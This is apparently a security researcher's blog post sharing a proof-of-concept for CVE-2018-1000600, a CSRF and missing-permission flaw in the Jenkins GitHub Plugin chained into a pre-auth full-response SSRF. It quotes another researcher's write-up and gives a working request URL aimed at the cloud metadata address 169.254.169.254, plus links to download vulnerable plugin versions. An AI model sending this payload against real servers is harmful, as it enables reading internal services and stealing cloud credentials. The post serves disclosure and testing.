Jenkins – CVE-2018-1000600 PoC Carnal0wnage

second exploit from the blog post


https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html


Chained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF
https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915


This affects the GitHub plugin that is installed by default. However, I learned that when you spin up a new jenkins instance it pulls all the updated plugins (also by default) I’m honestly not sure how often people set update to latest plugin on by default but it does seem to knock down some of this stuff.


exploit works against: GitHub Plugin up to and including 1.29.1


When i installed Jenkins today (25 Feb 19) it installed 1.29.4 by default thus the below does NOT work.


From the blog post:

CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials 

It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)

Although it can’t extract any credentials without known credentials ID, there is still another attack primitive – a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!

PoC:

http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai

To get old versions of the plugin and info you can go to  

https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin


download old versions
https://updates.jenkins.io/download/plugins/github-branch-source/
https://updates.jenkins.io/download/plugins/github/